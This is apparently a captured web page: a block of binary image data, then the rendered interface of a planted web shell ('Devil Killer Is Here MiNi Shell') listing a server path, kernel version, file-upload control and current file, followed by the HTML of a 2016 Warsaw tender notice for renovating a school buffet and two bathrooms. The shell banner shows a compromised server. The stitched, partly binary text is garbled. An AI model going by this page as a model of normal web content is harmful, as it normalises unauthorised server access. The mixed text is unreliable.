JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160601/64605-N-2016.html

<p class="kh_header"><b>Warszawa: Wykonanie remontu bufetu i dwóch łazienek w budynku Zespołu Szkół nr 22 przy ul. Konopczyńskiego 4 w Warszawie (znak sprawy ZP-45/16).</b><br>
<b>Numer ogłoszenia: 64605 - 2016; data zamieszczenia: 01.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa Dzielnica Śródmieście , ul. Nowogrodzka 43, 00-691 Warszawa, woj. mazowieckie, tel. 22 443 93 93, faks 22 443 94 85.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.srodmiescie.warszawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie remontu bufetu i dwóch łazienek w budynku Zespołu Szkół nr 22 przy ul. Konopczyńskiego 4 w Warszawie (znak sprawy ZP-45/16)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia: Przedmiotem zamówienia jest wykonanie bufetu i dwóch łazienek w budynku Zespołu Szkół nr 22 przy ul. Konopczyńskiego 4 w Warszawie, zgodnie z: 1. Dokumentacją projektową zawierającą: 1) Projekt budowlano-wykonawczy remontu budynku Zespołu Szkół nr 22 im. Emiliana Konopczyńskiego BUFET, wykonany dnia 4 kwietnia 2016 r. przez Pracownię Architektoniczną TEAM PROJEKT, ul. Hetmańska 21/4, Warszawa. Autorzy: architektura mgr inż. arch. Teresa Czaplińska, sprawdził mgr inż. arch. Barbara Leśniewska-Wekka; instalacje sanitarne projektował mgr inż. Danuta Dudonis-Krupa, sprawdził mgr inż. Anna Giżyńska; instalacja wentylacji projektował mgr inż. Anna Giżyńska, sprawdził mgr inż. Danuta Dudonis-Krupa; instalacje elektryczne projektował mgr inż. Andrzej Augustyniak, sprawdził mgr inż. Wojciech Wardzyński. 2) Projekt  budowlano-wykonawczy remontu budynku Zespołu Szkół nr 22 im. Emiliana Konopczyńskiego Łazienka 1, wykonany dnia 4 kwietnia 2016 r. przez Pracownię Architektoniczną TEAM PROJEKT, ul. Hetmańska 21/4, Warszawa. Autorzy: architektura mgr inż. arch. Teresa Czaplińska, sprawdził mgr inż. arch. Barbara Leśniewska-Wekka; instalacje sanitarne projektował mgr inż. Danuta Dudonis-Krupa, sprawdził mgr inż. Anna Giżyńska; instalacja wentylacji projektował mgr inż. Anna Giżyńska, sprawdził mgr inż. Danuta Dudonis-Krupa; instalacje elektryczne projektował mgr inż. Andrzej Augustyniak, sprawdził mgr inż. Wojciech Wardzynski. 3) Projekt  budowlano-wykonawczy remontu budynku Zespołu Szkół nr 22 im. Emiliana Konopczyńskiego Łazienka 2, wykonany dnia 4 kwietnia 2016 r. przez Pracownię Architektoniczną TEAM PROJEKT, ul. Hetmańska 21/4, Warszawa. Autorzy: architektura mgr inż. arch. Teresa Czaplińska, sprawdził mgr inż. arch. Barbara Leśniewska-Wekka; instalacje sanitarne projektował mgr inż. Danuta Dudonis-Krupa, sprawdził mgr inż. Anna Giżyńska; instalacja wentylacji projektował mgr inż. Anna Giżyńska, sprawdził mgr inż. Danuta Dudonis-Krupa; instalacje elektryczne projektował mgr inż. Andrzej Augustyniak, sprawdził mgr inż. Wojciech Wardzynski. 4) Przedmiar robót dla remontu budynku Zespołu Szkół nr 22 im. Emiliana Konopczyńskiego BUFET, branża budowlana, wykonana dnia 4 kwietnia 2016 r. przez Pracownię Architektoniczną TEAM PROJEKT, ul. Hetmańska 21/4, Warszawa. Autor mgr inż. arch. Teresa Czaplińska. 5) Przedmiar robót remontu budynku Zespołu Szkół nr 22 im. Emiliana Konopczyńskiego BUFET, branża sanitarna wod.-kan., wykonana dnia 4 kwietnia 2016 r. przez Pracownię Architektoniczną TEAM PROJEKT, ul. Hetmańska 21/4, Warszawa. Autor: mgr inż. Anna Giżyńska. 6) Przedmiar robót dla remontu budynku Zespołu Szkół nr 22 im. Emiliana Konopczyńskiego BUFET, branża sanitarna instalacja wentylacji, wykonana dnia 4 kwietnia 2016 r. przez Pracownię Architektoniczną TEAM PROJEKT, ul. Hetmańska 21/4, Warszawa. Autor: mgr inż. Anna Giżyńska. 7) Przedmiar robót remontu budynku Zespołu Szkół nr 22 im. Emiliana Konopczyńskiego BUFET, branża elektryczna, wykonana dnia 4 kwietnia 2016 r. przez Pracownię Architektoniczną TEAM PROJEKT, ul. Hetmańska 21/4, Warszawa. Autor: mgr  inż. Andrzej Augustyniak. 8) Przedmiar robót dla remontu budynku Zespołu Szkół nr 22 im. Emiliana Konopczyńskiego Łazienka 1, branża budowlana, wykonana dnia 4 kwietnia 2016 r. przez Pracownię Architektoniczną TEAM PROJEKT, ul. Hetmańska 21/4, Warszawa. Autor: mgr inż. arch. Teresa Czaplińska. 9) Przedmiar robót remontu budynku Zespołu Szkół nr 22 im. Emiliana Konopczyńskiego Łazienka 1, branża sanitarna wod.-kan., wykonana dnia 4 kwietnia 2016 r. przez Pracownię Architektoniczną TEAM PROJEKT, ul. Hetmańska 21/4, Warszawa. Autor: mgr inż. Anna Giżyńska. 10) Przedmiar robót dla remontu budynku Zespołu Szkół nr 22 im. Emiliana Konopczyńskiego Łazienka 1, branża sanitarna instalacja wentylacji, wykonana dnia 4 kwietnia 2016 r. przez Pracownię Architektoniczną TEAM PROJEKT, ul. Hetmańska 21/4, Warszawa. Autor mgr inż. Anna Giżyńska. 11) Przedmiar robót remontu budynku Zespołu Szkół nr 22 im. Emiliana Konopczyńskiego Łazienka 1,  branża elektryczna, wykonana dnia 4 kwietnia 2016 r. przez Pracownię Architektoniczną TEAM PROJEKT, ul. Hetmańska 21/4, Warszawa. Autor mgr  inż. Andrzej Augustyniak. 12) Przedmiar robót dla remontu budynku Zespołu Szkół nr 22 im. Emiliana Konopczyńskiego Łazienka 2, branża budowlana, wykonana dnia 4 kwietnia 2016 r. przez Pracownię Architektoniczną TEAM PROJEKT, ul. Hetmańska 21/4, Warszawa. Autor mgr inż. arch. Teresa Czaplińska. 13) Przedmiar robót remontu budynku Zespołu Szkół nr 22 im. Emiliana Konopczyńskiego Łazienka 2, branża sanitarna wod.-kan., wykonana dnia 4 kwietnia 2016 r. przez Pracownię Architektoniczną TEAM PROJEKT, ul. Hetmańska 21/4, Warszawa. Autor mgr inż. Anna Giżyńska. 14) Przedmiar robót dla remontu budynku Zespołu Szkół nr 22 im. Emiliana Konopczyńskiego Łazienka 2,  branża sanitarna instalacja wentylacji, wykonana dnia 2 kwietnia 2016 r. przez Pracownię Architektoniczną TEAM PROJEKT, ul. Hetmańska 21/4, Warszawa. Autor mgr inż. Anna Giżyńska. 15) Przedmiar robót remontu budynku Zespołu Szkół nr 22 im. Emiliana Konopczyńskiego Łazienka 2,  branża elektryczna, wykonana dnia 4 kwietnia 2016 r. przez Pracownię Architektoniczną TEAM PROJEKT, ul. Hetmańska 21/4, Warszawa. Autor mgr  inż. Andrzej Augustyniak. 2. Specyfikacją  techniczną wykonania i odbioru robót budowlanych  dla remontu budynku Zespołu Szkół nr 22 im. Emiliana Konopczyńskiego BUFET, branża budowlana, wykonana dnia 4 kwietnia 2016 r. przez Pracownię Architektoniczną TEAM PROJEKT, ul. Hetmańska 21/4, Warszawa, sporządziła mgr inż. arch. Teresa Czaplińska. 3. Specyfikacją  techniczną wykonania i odbioru robót budowlanych  dla remontu budynku Zespołu Szkół nr 22 im. Emiliana Konopczyńskiego BUFET, branża sanitarna wod.-kan., wykonana dnia 4 kwietnia 2016 r. przez Pracownię Architektoniczną TEAM PROJEKT, ul. Hetmańska 21/4, Warszawa, sporządziła mgr inż. Danuta Dudonis-Krupa. 4. Specyfikacją techniczną wykonania i odbioru robót budowlanych  dla remontu budynku Zespołu Szkół nr 22 im. Emiliana Konopczyńskiego BUFET, branża sanitarna instalacja wentylacji, wykonana dnia 4 kwietnia 2016 r. przez Pracownię Architektoniczną TEAM PROJEKT, ul. Hetmańska 21/4, Warszawa, sporządziła  mgr inż. Anna Giżyńska. 5. Specyfikacją techniczną wykonania i odbioru robót budowlanych  dla remontu budynku Zespołu Szkół nr 22 im. Emiliana Konopczyńskiego BUFET, branża elektryczna, wykonana dnia 4 kwietnia 2016 r. przez Pracownię Architektoniczną TEAM PROJEKT, ul. Hetmańska 21/4, Warszawa, sporządził mgr  inż. Andrzej Augustyniak. 6. Specyfikacją techniczną wykonania i odbioru robót budowlanych  dla remontu budynku Zespołu Szkół nr 22 im. Emiliana Konopczyńskiego Łazienka 1, branża budowlana, wykonana dnia 4 kwietnia 2016 r. przez Pracownię Architektoniczną TEAM PROJEKT, ul. Hetmańska 21/4, Warszawa, sporządziła mgr inż. arch. Teresa Czaplińska. 7. Specyfikacją techniczną wykonania i odbioru robót budowlanych  dla remontu budynku Zespołu Szkół nr 22 im. Emiliana Konopczyńskiego Łazienka 1, branża sanitarna wod.-kan., wykonana dnia 4 kwietnia 2016 r. przez Pracownię Architektoniczną TEAM PROJEKT, ul. Hetmańska 21/4, Warszawa, sporządziła mgr inż. Danuta Dudonis-Krupa. 8. Specyfikacją techniczną wykonania i odbioru robót budowlanych  dla remontu budynku Zespołu Szkół nr 22 im. Emiliana Konopczyńskiego Łazienka 1, branża sanitarna instalacja wentylacji, wykonana dnia 4 kwietnia 2016 r. przez Pracownię Architektoniczną TEAM PROJEKT, ul. Hetmańska 21/4, Warszawa, sporządziła  mgr inż. Anna Giżyńska.
9. Specyfikacją techniczną wykonania i odbioru robót budowlanych  dla remontu budynku Zespołu Szkół nr 22 im. Emiliana Konopczyńskiego Łazienka 1, branża elektryczna, wykonana dnia 4 kwietnia 2016 r. przez Pracownię Architektoniczną TEAM PROJEKT, ul. Hetmańska 21/4, Warszawa, sporządził mgr inż. Andrzej Augustyniak. 10. Specyfikacją techniczną wykonania i odbioru robót budowlanych  dla remontu budynku Zespołu Szkół nr 22 im. Emiliana Konopczyńskiego Łazienka 2, branża budowlana, wykonana dnia 4 kwietnia 2016 r. przez Pracownię Architektoniczną TEAM PROJEKT, ul. Hetmańska 21/4, Warszawa, sporządziła mgr inż. arch. Teresa Czaplińska. 11. Specyfikacją techniczną wykonania i odbioru robót budowlanych  dla remontu budynku Zespołu Szkół nr 22 im. Emiliana Konopczyńskiego Łazienka 2, branża sanitarna wod.-kan., wykonana dnia 4 kwietnia 2016 r. przez Pracownię Architektoniczną TEAM PROJEKT, ul. Hetmańska 21/4, Warszawa, sporządziła mgr inż. Danuta Dudonis-Krupa. 12. Specyfikacją techniczną wykonania i odbioru robót budowlanych  dla remontu budynku Zespołu Szkół nr 22 im. Emiliana Konopczyńskiego Łazienka 2, branża sanitarna instalacja wentylacji, wykonana dnia 4 kwietnia 2016 r. przez Pracownię Architektoniczną TEAM PROJEKT, ul. Hetmańska 21/4, Warszawa, sporządziła  mgr inż. Anna Giżyńska. 13. Specyfikacją techniczną wykonania i odbioru robót budowlanych  dla remontu budynku Zespołu Szkół nr 22 im. Emiliana Konopczyńskiego Łazienka 2, branża elektryczna, wykonana dnia 4 kwietnia 2016 r. przez Pracownię Architektoniczną TEAM PROJEKT, ul. Hetmańska 21/4, Warszawa, sporządził mgr inż. Andrzej Augustyniak. Ww. opracowania stanowią załącznik nr 7 do SIWZ. Zamawiający dopuszcza rozwiązania równoważne opisanym w  dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót. Wykonawca, który powołuje się na rozwiązania równoważne do opisanych przez Zamawiającego jest obowiązany wykazać, że oferowane przez niego produkty, urządzenia i technologie spełniają wymagania określone przez Zamawiającego. W przypadku zaoferowania innych urządzeń niż określone w SIWZ należy dołączyć do oferty karty katalogowe tych urządzeń. W zakres zamówienia wchodzi m.in.: - roboty rozbiórkowe, - naprawa tynków oraz odmalowanie ścian i sufitów, - wymiana okładzin podłogowych i ściennych, - wymiana instalacji elektrycznej z osprzętem, - wymiana instalacji sanitarnej z montażem osprzętu, - wykonanie zabudowy grzejników i ścian w bufecie oraz w łazience dla niepełnosprawnych, - montaż kabin sanitarnych, sufitów podwieszonych, - wykonanie wentylacji, - wymiana stolarki drzwiowej. UWAGA:
1. Przed wbudowaniem materiały powinny uzyskać akceptację inspektora nadzoru w danej branży oraz Dyrekcji placówki oświatowej. 2. Użyte materiały i urządzenia winny być dopuszczone do stosowania w obiektach szkolnych.
3. Roboty demontażowe należy przeprowadzić metodą ręczną. Gruz i materiały z rozbiórki należy gromadzić w kontenerach. 4. Należy dostarczyć Zamawiającemu instrukcję konserwacji i regulacji oraz instrukcję bezpiecznego użytkowania urządzeń. Szczegółowy opis przedmiotu zamówienia zawarty jest w projekcie umowy (załącznik nr 6 do SIWZ). Wymagany termin wykonania zamówienia 3 dni od  daty zawarcia umowy do dnia 30 sierpnia 2016r..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.31.00.00-3, 45.33.24.00-7, 45.33.10.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że posiada doświadczenie zawodowe polegające na wykonaniu w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończonego, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednego zamówienia obejmującego wykonanie robót budowlanych w branży budowlanej, sanitarnej i elektrycznej z wyłączeniem robót w lokalach mieszkalnych.  Wartość zamówienia - jednej umowy nie może być mniejsza niż 200.000,00 zł (brutto). W zakresie wykazania spełniania przez Wykonawcę tego warunku należy przedłożyć oświadczenie o spełnieniu warunków udziału w postępowaniu (załącznik nr 2 do SIWZ). Ocena spełnienia warunku udziału w postępowaniu dokonana będzie zgodnie z formułą spełnia - nie spełnia na podstawie złożonego przez Wykonawcę oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Pełnomocnictwo, w przypadku gdy Wykonawcę reprezentuje pełnomocnik. 2) Dokumenty dotyczące Wykonawców polegających na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych. Jeżeli Wykonawca, wykazując spełnianie warunków w postępowaniu, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia oraz że stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. 5. Zasady składania ofert wspólnych przez Wykonawców, o których mowa w art. 23 ustawy Prawo zamówień publicznych. 1) W przypadku udziału w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu 
i zawarcia umowy w sprawie o udzielenie zamówienia publicznego. Powyższe nie dotyczy wspólników spółki cywilnej, w przypadku, gdy każdy wspólnik jest umocowany do samodzielnego reprezentowania wspólników spółki cywilnej. (Szczegółowe zasady określone zostały w części IX SIWZ). 2) Wykonawcy, którzy wspólnie ubiegają się o udzielenia zamówienia mogą łącznie spełniać warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych. 3) W przypadku oferty składanej wspólnie przez kilku Wykonawców, warunek dotyczący braku podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego w okolicznościach, o których mowa w art. 24 ust. 1 ustawy musi spełniać każdy z Wykonawców. (Oświadczenie o którym mowa w części V pkt 2 SIWZ składa każdy wykonawca). 4) Każdy z Wykonawców składających ofertę wspólnie przedkłada listę podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów (Dz. U. 2007 r., Nr 50, poz. 331 ze zm.), albo informację o tym, że nie należy do grupy kapitałowej.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres rękojmi - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ustawy Prawo zamówień publicznych Zamawiający przewiduje zmiany zawartej umowy dotyczące odpowiednio zmniejszenia wartości zamówienia lub terminu realizacji zamówienia w przypadku zaistnienia jednej z następujących okoliczności: 1) w razie konieczności podjęcia działań zmierzających do ograniczenia skutków zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć, zagrażającego życiu lub zdrowiu ludzi, 2) w następstwie wykraczających poza terminy określone w KPA procedur administracyjnych oraz innych terminów formalno-prawnych mających wpływ na terminy realizacji zamówienia, 3) ujawnienia w trakcie robót urządzeń podziemnych, elementów instalacji, konstrukcji, których istnienie lub lokalizacja nie wynika z map uzbrojenia uzgodnionych przez ZUD lub dokumentacji projektowej, 4) ograniczenia środków budżetowych przeznaczonych na realizację zamówienia, 5) zmiany zakresu przedmiotu zamówienia, jeżeli konieczność wprowadzenia takiej zmiany jest skutkiem zmiany przepisów prawa, 6) ograniczenia przez Zamawiającego zakresu przedmiotu umowy z przyczyn, których nie można było przewidzieć w chwili zawarcia umowy, 7) zmiany części zamówienia lub zgłoszenia udziału podwykonawcy lub dalszego podwykonawcy, 8) zmiany podwykonawcy, jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, w celu wykazania spełniania warunków udziału w postępowaniu. Wykonawca jest zobowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postepowania o udzielenie zamówienia, 9) działania siły wyższej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.srodmiescie.warszawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 00-691 Warszawa, ul. Nowogrodzka 43, pok. 308. Wnioski o przekazanie SIWZ należy składać: Warszawa, ul. Nowogrodzka 43 pok. 308 lub faks (22) 443 94 85. Opłata za formularz SIWZ wynosi 59,00 zł..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.06.2016 godzina 10:00, miejsce: 00-691 Warszawa, ul. Nowogrodzka 43, Kancelaria Ogólna..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający wykluczy z postępowania o udzielenie zamówienia Wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy Wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co Zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wykluczy z postępowania o udzielenie zamówienia Wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia..</p>
